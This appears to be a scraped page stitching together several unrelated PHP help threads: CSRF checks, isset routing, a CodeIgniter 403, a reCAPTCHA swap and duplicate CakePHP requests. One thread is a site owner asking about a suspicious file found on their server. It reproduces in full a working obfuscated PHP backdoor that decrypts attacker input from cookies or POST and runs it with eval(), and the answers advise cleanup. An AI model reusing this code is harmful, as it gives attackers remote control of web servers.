I have this piece of code in PHP web app.
if (isset($require_admin) && $require_admin) {
if(!check_admin()) {
$toolContent_ErrorExists = $langCheckAdmin;
$errorMessagePath = "../../";
}
}
The normal behavior is that if the variable $require_admin is set and true,the code will check if the visit is by the admin.
I try to add a similar piece of code some lines below so as to make other things like checking for cross-origin(especially CSRF) requests.
if (isset($require_token) && $require_token) {
if( !checkToken( $mycsrf_token, $myform)) {
$toolContent_ErrorExists = $langCheckToken;
$errorMessagePath = "../../";
}
}
I had in mind that in this way i will have a check that the posted forms I get are valid and if no,there would be an error message.
However,when $require_token is set and true,and the condition is verified i have a very strange result.Not only nothing happens for the csrf validation,but the above function stops working properly and admin restriction stops to work.
I know the question maybe is ambiguous but I cannot get what's going on there.I'm not so experienced on web programming and totally new in PHP so maybe someone could have a better idea!
Related
I am sorry to ask a silly question but I am not able to figure this out. I found a PHP file in my root directory with strange code. I know little bit PHP but this is a very strange code inside the PHP code. I am sure that it is not PHP functions. I don't know what is this code about.
Is my website compromised? Can some tell me that they can do with my website through this code. I am raising this question here because maybe this can help some one to save their websites.
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
$GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]] = $GLOBALS['t7004'][61].$GLOBALS['t7004'][4].$GLOBALS['t7004'][59];
$GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][79];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][53].$GLOBALS['t7004'][59].$GLOBALS['t7004'][92].$GLOBALS['t7004'][55].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][6].$GLOBALS['t7004'][77].$GLOBALS['t7004'][6].$GLOBALS['t7004'][2].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][32].$GLOBALS['t7004'][4].$GLOBALS['t7004'][32].$GLOBALS['t7004'][72].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][84].$GLOBALS['t7004'][77].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]] = $GLOBALS['t7004'][43].$GLOBALS['t7004'][56].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][2].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][6].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][49].$GLOBALS['t7004'][75].$GLOBALS['t7004'][41].$GLOBALS['t7004'][10].$GLOBALS['t7004'][62].$GLOBALS['t7004'][13];
$GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]] = $GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][71].$GLOBALS['t7004'][13].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] = $_POST;
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] = $_COOKIE;
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74], NULL);
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83], 0);
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][52].$GLOBALS['t7004'][56].$GLOBALS['t7004'][64].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][64].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][84].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55], 0);
#$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]](0);
$rcc6ec6 = NULL;
$e6ca3e0 = NULL;
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][29].$GLOBALS['t7004'][10].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][10].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][61].$GLOBALS['t7004'][10].$GLOBALS['t7004'][56].$GLOBALS['t7004'][85].$GLOBALS['t7004'][55].$GLOBALS['t7004'][0].$GLOBALS['t7004'][71].$GLOBALS['t7004'][61].$GLOBALS['t7004'][55].$GLOBALS['t7004'][13].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][85].$GLOBALS['t7004'][0].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][75].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][71].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][55].$GLOBALS['t7004'][29];
global $c6278d728;
function f7684f5ee($rcc6ec6, $r8c6)
{
$ua52559 = "";
for ($o4b1=0; $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6);)
{
for ($b1ad67b=0; $b1ad67b<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($r8c6) && $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6); $b1ad67b++, $o4b1++)
{
$ua52559 .= $GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]]($GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($rcc6ec6[$o4b1]) ^ $GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($r8c6[$b1ad67b]));
}
}
return $ua52559;
}
function y10245($rcc6ec6, $r8c6)
{
global $c6278d728;
return $GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($rcc6ec6, $c6278d728), $r8c6);
}
foreach ($GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] as $r8c6=>$ob6137983)
{
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
}
if (!$rcc6ec6)
{
foreach ($GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] as $r8c6=>$ob6137983)
{
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
}
}
$rcc6ec6 = #$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]]($rcc6ec6), $e6ca3e0));
if (isset($rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]]) && $c6278d728==$rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]])
{
if ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][6])
{
$o4b1 = Array(
$GLOBALS['t7004'][32].$GLOBALS['t7004'][72] => #$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]](),
$GLOBALS['t7004'][83].$GLOBALS['t7004'][72] => $GLOBALS['t7004'][75].$GLOBALS['t7004'][9].$GLOBALS['t7004'][41].$GLOBALS['t7004'][0].$GLOBALS['t7004'][75],
);
echo #$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]]($o4b1);
}
elseif ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][55])
{
eval($rcc6ec6[$GLOBALS['t7004'][79]]);
}
exit();
}
(I'm not able yet to answer)
I had similar code on a customer website with a joomla install, several times.
If your webhost hasn't a code-checker were it blacklists hacked files, you should have to search the whole public_html directory.
I had one recent case where the code included several new files in a wordpress install, across different folders and some hidden with even meaningful names. I had to go thorugh every folder and check files with the same date (the hacking date - last modification) and go through each one to check if it was completely malicious code or just partly.
But usually I radically delete sections and files with encrypted code, they generally are hacked files...
The code you have posted is obfuscated PHP. The string at the beginning with all the \x 's in it is a hex representation of a string.
There is a neat site named "DDecode" I found here: Hex Decoder which will attempt to do exactly what it says.
Plugging your code into that site we can see that the first part:
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
becomes:
<?php ${"GLOBALS"}['t7004'] = "-#_]hEi:\xa.29`5D\x9Yj{P\xd}W+)S~V7HFp|INR%&BZ0*bQ/<3MyT;mt"eaqor^c4[xwOXCG#fvAg1=nLdU?$su6(>!z8,lK'kJ\";
I am not super familiar with PHP myself, however we can see that a variable is being set here to a long, apparently random string. From there we can look at the rest of the code and see that it is almost entirely a series of references back to this initial string. In this way the attacker has hidden what their code is doing by making it appear nonsensical, which is the point of obfuscation of course.
You could take the time to dereference all of those calls if you wanted to try and get a better idea of what the code is doing. Also there may be some security researchers who would be interested in seeing this code and could possibly give you more insight into what it is doing.
As for the state of your website - if you didn't do this then yes, the chances are highly likely it has been compromised and you should at a minimum, as the comments suggested:
roll back to a clean, known good version
update your host with any applicable patches
INFORM YOUR USERS! Especially since you are unsure what this code does it is important to let your users know that your site has potentially been compromised so they can take the appropriate actions.
I am having an issue using isset to display content on a page.
My PHP file is called messages.php
I am directing my users with links to this URL: messages.php?inbox using if(isset($_GET['inbox']))
{ } to display the users inbox. Same principle with the other users options such as compose message is: messages.php?compose again using isset
The only problem I have is that I cannot stop people from manually typing stuff like domain.com/messages.php or domain.com/messages.php?somethingrandom.
Is there a way to direct users to messages.php?inbox when they type in the address bar something that isnt assigned to isset?
I did try to use switch but couldnt seem to get it to work properly with how ive laid out my HTML.
An example of the whole file is here http://pastebin.com/SfqN2L7g
I am fairly new to PHP and think I may have gone down the complicated route.
Any advice would be appreciated.
Thanks
The answer you added already would work, but I usually like having an array of valid options which I could maybe check against later on.
$validPages = array('inbox', 'compose');
$pageFound = false;
foreach ($validPages as $validPage) {
if (isset($_GET[$validPage])) {
$pageFound = true;
break;
}
}
if (! $pageFound) {
header('Location: /messages.php?inbox');
}
Thanks to the help of Marcos Pérez Gude, the answer is as follows:
if(isset($_GET['inbox']) || isset($_GET['compose'])){
//Then do below
}else{
header("Location: messages.php?inbox");
exit;
}
CodeIgniter 2.1.4
After doing a little research about CodeIgniter's XSS protections, I decided to quickly and crudely test this by typing some random HTML into any input field on my CodeIgniter forms.
When I typed in <script>, the page is redirected to the server's default 403 error ("Forbidden") page. It's not even a CodeIgniter error page.
I'm very glad that any input data containing <script> is stopped, however, I'm not understanding why this is generating a 403 error page instead of a validation error, or at least pass the data with the offending parts stripped out.
I'm using htmlentities() to convert the < and > but this makes no difference.
It doesn't even matter if implement the form validation. The input data of <script> will generate a 403 error even without it.
Can anyone explain what's happening here and if I need to be worried out how this is being handled/redirected? To me it just seems like I should be getting some sort of CodeIgniter validation error or stripped down data rather than a 403 error.
Here is a concise version of one of my Controllers. (It's happening on all Controllers with data input fields.)
public function search($search_slug = NULL)
{
$this->load->library('form_validation');
$this->form_validation->set_rules('search-terms', 'Search Terms', 'xss_clean');
if ($this->input->post('search-terms') && ($this->form_validation->run() !== FALSE))
{
$search_slug = url_title(htmlentities($this->input->post('search-terms')), 'dash', FALSE);
}
if ($search_slug !== NULL)
{
$search_terms = preg_replace('/-/', ' ', $search_slug);
$query = // get my results from model;
if ($query['count'] > 0)
{
$data['results'] = $query['results'];
}
else
{
$data['results'] = '<h3>Sorry, nothing found.</h3>';
}
}
else
{
$data['results'] = '<h3>Please enter your search terms.</h3>';
}
$this->template->load('default', 'search', $data);
}
After reading the comments on my OP and digging into it deeper, this 403 redirect doesn't seem to have anything to with CodeIgniter after all.
Also, after installing ZenPhoto on the same account, I see the 403 redirect when entering <script> into the ZenPhoto search box too.
Since it's shared hosting, I cannot say, with 100% certainty, that this is the result of something in Apache protecting itself, but all evidence seems to point there.
This character is not allowed.
check accepted answer # SO - characters allowed in a url
Your request wasn't reaching index.php
Apart from that have a look at application/config/config.php
$config['permitted_uri_chars'] = 'a-z 0-9~%.:_\-';
These are the characters your application allows when a request reaches it.
I recenlty had a site designed for me, but my dev used a really crappy generic captcha that fails half the time. I'm trying to replace it using a recaptcha, but I'm having trouble. I cannot figure out which *.php is used for 'processing' and which is used for the 'form'.
I didn't want to post the whole code, so here it is:
This is the 'form' page, as it has the form fields and etc embedded:
http://dl.dropbox.com/u/45666699/formcode.txt
Can someone please take a look at this code and tell me where I should put the private code for recaptcha? Also, how do I disable the "random_number" captcha that is already installed? Thanks!
the code for your existing captcha is on line 295, 296 and 297
require_once('recaptchalib.php');
$publickey = "6LfIUdISAAAAAKguxgdPCjZ6-OkVeu5tmcBaa7ug"; // you got this from the signup page
echo recaptcha_get_html($publickey);
Well you'll need the private key when you're trying to validate that the correct captch was entered (i.e. at the point where you're handling the form submission)
Which by looking at your code should start immediately after line 4
Using a project i did a while back, you would have something like so...
$recaptcha_error = NULL;
//set it to NULL initially
if(isset($_POST["btnsend"])){
include_once(INCLUDES_FOLDER."recaptcha-php-1.11/recaptchalib.php");
$resp = recaptcha_check_answer(RECAPTCHA_PRIVATE_KEY,$_SERVER["REMOTE_ADDR"],$_POST["recaptcha_challenge_field"],$_POST["recaptcha_response_field"]);
if($resp->is_valid){
//captch was gotten correctly
//continue with your normal code processing here
} else {
//wrong input -- captch was invalid -- give the person the error response
//mine is as below -- my usual way :)
$response = array(array("Something seems to be wrong with the captcha!","Please check that you entered it correctly or check the returned error message"),false,"w");
$recaptcha_error = $resp->error;
//make sure to do the above so u can use it when generating the captcha display
}
}
//You got the recaptch error (or left it as NULL above so you could do this)
//when generating your captch display as done on your lines 295, 296, 297
include_once(INCLUDES_FOLDER."recaptcha-php-1.11/recaptchalib.php");
echo recaptcha_get_html(RECAPTCHA_PUBLIC_KEY,$recaptcha_error);
Hope this helps (even if a little) :)
Cheers
I have a strange problem with my cake (cake_1.2.0.7296-rc2).
My start()-action runs twice, under certain circumstances, even though only one request is made.
The triggers seem to be :
- loading an object like: $this->Questionnaire->read(null, $questionnaire_id);
- accessing $this-data
If I disable the call to loadAvertisement() from the start()-action, this does not happen.
If I disable the two calls inside loadAdvertisement():
$questionnaire = $this->Questionnaire->read(null, $questionnaire_id);
$question = $this->Questionnaire->Question->read(null, $question_id);
... then it doesn't happen either.
Why?
See my code below, the Controller is "questionnaires_controller".
function checkValidQuestionnaire($id)
{
$this->layout = 'questionnaire_frontend_layout';
if (!$id)
{
$id = $this->Session->read('Questionnaire.id');
}
if ($id)
{
$this->data = $this->Questionnaire->read(null, $id);
//echo "from ".$questionnaire['Questionnaire']['validFrom']." ".date("y.m.d");
//echo " - to ".$questionnaire['Questionnaire']['validTo']." ".date("y.m.d");
if ($this->data['Questionnaire']['isPublished'] != 1
//|| $this->data['Questionnaire']['validTo'] < date("y.m.d")
//|| $this->data['Questionnaire']['validTo'] < date("y.m.d")
)
{
$id = 0;
$this->flash(__('Ungültiges Quiz. Weiter zum Archiv...', true), array('action'=>'archive'));
}
}
else
{
$this->flash(__('Invalid Questionnaire', true), array('action'=>'intro'));
}
return $id;
}
function start($id = null) {
$this->log("start");
$id = $this->checkValidQuestionnaire($id);
//$questionnaire = $this->Questionnaire->read(null, $id);
$this->set('questionnaire', $this->data);
// reset flow-controlling session vars
$this->Session->write('Questionnaire',array('id' => $id));
$this->Session->write('Questionnaire'.$id.'currQuestion', null);
$this->Session->write('Questionnaire'.$id.'lastAnsweredQuestion', null);
$this->Session->write('Questionnaire'.$id.'correctAnswersNum', null);
$this->loadAdvertisement($id, 0);
$this->Session->write('Questionnaire'.$id.'previewMode', $this->params['named']['preview_mode']);
if (!$this->Session->read('Questionnaire'.$id.'previewMode'))
{
$questionnaire['Questionnaire']['participiantStartCount']++;
$this->Questionnaire->save($questionnaire);
}
}
function loadAdvertisement($questionnaire_id, $question_id)
{
//$questionnaire = array();
$questionnaire = $this->Questionnaire->read(null, $questionnaire_id);
//$question = array();
$question = $this->Questionnaire->Question->read(null, $question_id);
if (isset($question['Question']['advertisement_id']) && $question['Question']['advertisement_id'] > 0)
{
$this->set('advertisement', $this->Questionnaire->Question->Advertisement->read(null, $question['Question']['advertisement_id']));
}
else if (isset($questionnaire['Questionnaire']['advertisement_id']) && $questionnaire['Questionnaire']['advertisement_id'] > 0)
{
$this->set('advertisement', $this->Questionnaire->Question->Advertisement->read(null, $questionnaire['Questionnaire']['advertisement_id']));
}
}
I really don't understand this... it don't think it's meant to be this way.
Any help would be greatly appreciated! :)
Regards,
Stu
Check your layout for non-existent links, for example a misconfigured link to favicon.ico will cause the controller action to be triggered for a second time. Make sure favicon.ico points towards the webroot rather than the local directory, or else requests will be generated for /controller/action/favicon.ico rather than /favicon.ico - and thus trigger your action.
This can also happen with images, stylesheets and javascript includes.
To counter check the $id is an int, then check to ensure $id exists as a primary key in the database before progressing on to any functionality.
For me it was a JS issue.
Take care of wrap function with jQuery that re-execute JS in wrapped content!
You might want to try and find out where it comes from using the debug_print_backtrace() function. (http://nl.php.net/manual/en/function.debug-print-backtrace.php
Had the same problem, with a certain action randomly running 2-3 times. I tracked down two causes:
Firefox add-on Yslow was set to load automatically from it's Preferences, causing pages to reload when using F5 (not when loading the page from the browser's address bar and pressing Enter).
I had a faulty css style declaration within the options of a $html->link(); in some cases it would end up as background-image: url('');, which caused a rerun also. Setting the style for the link to background-image: none; when no image was available fixed things for me.
Hope this helps. I know this is quite an old post, but as it comes up pretty high in Google when searching for this problem, I thought it might help others by still posting.
Good luck
Jeroen den Haan
I had a problem like this last week.
Two possible reasons
Faulty routes (DO check your routes configuration)
Faulty AppController. I add loads of stuff into AppController, especially to beforeFilter() and beforeRender() so you might want to check those out also.
One more thing, are where are you setting the Questioneer.id in your Session? Perhaps that's the problem?
Yes, it occurs when there is a broken link in the web page. Each browser deals with it variously (Firefox calls it 2x). I tested it, there is no difference in CakePHP v1.3 and v2.2.1. To find out who the culprit is, add this line to the code, and then open the second generated file in you www folder:
file_put_contents("log-" . date("Hms") . ".txt", $this->params['pass'] ); // CakePHP v1.3
file_put_contents("log-" . date("Hms") . ".txt", $this->request['pass'] ); //CakePHP v2.2.1
PS: First I blame jQuery for it. But in the end it was forgotten image for AJAX loading in 3rd part script.
I had the same problem in chrome, I disabled my 'HTML Validator' add on. Which was loading the page twice
I was having a similar issue, the problem seemed to be isolated to case-insensitivity on the endpoint.
ie:
http://server/Questionnaires/loadAvertisement -vs-
http://server/questionnaires/loadavertisement
When calling the proper-cased endpoint, the method ran once -whereas the lower-cased ran twice. The problem was occurring sporadically -happening on one controller, but not on another (essentially the same logic, no additional components etc.). I couldn't confirm, but believe the fault to be of the browser -not the CakePHP itself.
My workaround was assuring that every endpoint link was proper-cased. To go even further, I added common case-variants to the Route's configuration:
app/config/routes.php
<?php
// other routes..
$instructions = ['controller'=>'Questionnaires','action'=>'loadAvertisement'];
Router::connect('/questionnaires/loadavertisement', $instructions);
Router::connect('/QUESTIONNARIES/LOADADVERTISEMENT', $instructions);
// ..etc
If you miss <something>, for example a View, Cake will trigger a missing <something> error and it will try to render its Error View. Therefore, AppController will be called twice. If you resolve the missing issue, AppController is called once.